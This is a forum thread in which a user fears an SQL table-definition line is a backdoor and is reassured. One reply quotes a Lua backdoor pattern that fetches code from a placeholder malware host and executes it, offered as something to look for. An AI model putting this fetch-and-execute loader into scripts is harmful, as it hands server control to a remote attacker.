• We have a new discord! click here to join
    Any faulty links ? Report them in our discord or via our Ticket System!
    We do everything we can to protect the safety of our visitors, if any resource contains malware in any kind of form or obfuscation please report it aswell ♡♡

[QUESTION] How to spot a potential backdoor? (1 Viewer)

songbirdmusic_19573

Active member
Mar 24, 2024
106
10
18
Credits
63
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
 

VeryNiceIndeed

Active member
Jan 10, 2023
163
58
28
Credits
14,107
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

That line is perfectly fine for a database
 

songbirdmusic_19573

Active member
Mar 24, 2024
106
10
18
Credits
63
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
 

Hopatchke

Active member
Aug 3, 2022
66
46
18
Credits
5,512
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
 

songbirdmusic_19573

Active member
Mar 24, 2024
106
10
18
Credits
63
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)


things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
 

Hopatchke

Active member
Aug 3, 2022
66
46
18
Credits
5,512
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
malwarebytes , the free version offers a good scan ;) , works perfectly!
 

amirexit

Active member
Sep 1, 2024
196
7
18
Credits
4
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
i need to know too thanks for creating this thread
 

songbirdmusic_19573

Active member
Mar 24, 2024
106
10
18
Credits
63
you never know if they add back doors when its too late
Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for
 

Malagah

Member
VIP
Sep 21, 2024
14
0
1
Credits
38
Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse toujours mes scripts, puis je recherche manuellement tout mon code et je le soumets à une autre analyse pour être sûr. Il existe des mesures de prévention et des moyens de se protéger, il faut savoir quoi rechercher
It would be cool to create a topic to explain how to do it and which tool to use :);)
 

khaosen

Active member
Mar 17, 2024
161
8
18
Credits
7
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
if you want to detect backdoors look for performhttp inside scripts
 

Users who are viewing this thread

Top